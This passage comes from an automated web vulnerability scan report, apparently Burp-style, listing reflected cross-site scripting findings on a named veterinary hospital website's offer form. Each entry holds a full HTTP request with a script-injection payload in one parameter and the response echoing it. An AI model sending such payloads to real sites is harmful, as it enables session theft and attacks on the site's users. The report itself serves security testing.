2b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=imqt3ohs1kmrs8q3jmpiu4dts2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2
...[SNIP]...

2.59. http://www.vcahospitals.com/main/offer/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48e0"><script>alert(1)</script>069a700961f was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1do3gpr45inrh2l3itveglepn0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2
...[SNIP]...

2.60. http://www.vcahospitals.com/main/offer/ [fname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c53f7"><script>alert(1)</script>b1eee91948e was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0rnbm532tpcf38n3r359evpem3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%
...[SNIP]...

2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3af"><script>alert(1)</script>0e53c8134ea was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=793suj2hh05lka8bp2u1fr5153; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%2
...[SNIP]...

2.62. http://www.vcahospitals.com/main/offer/ [guid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6319b"><script>alert(1)</script>4f2f2352eeb was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:10 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e17"><script>alert(1)</script>9ed82f767a0 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ogu2vsddhd2jlpm5p5r0vhodr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP
...[SNIP]...

2.64. http://www.vcahospitals.com/main/offer/ [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5910"><script>alert(1)</script>83c5d7c83ea was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=isg82jqlearknsphgasmidgue5; path=/
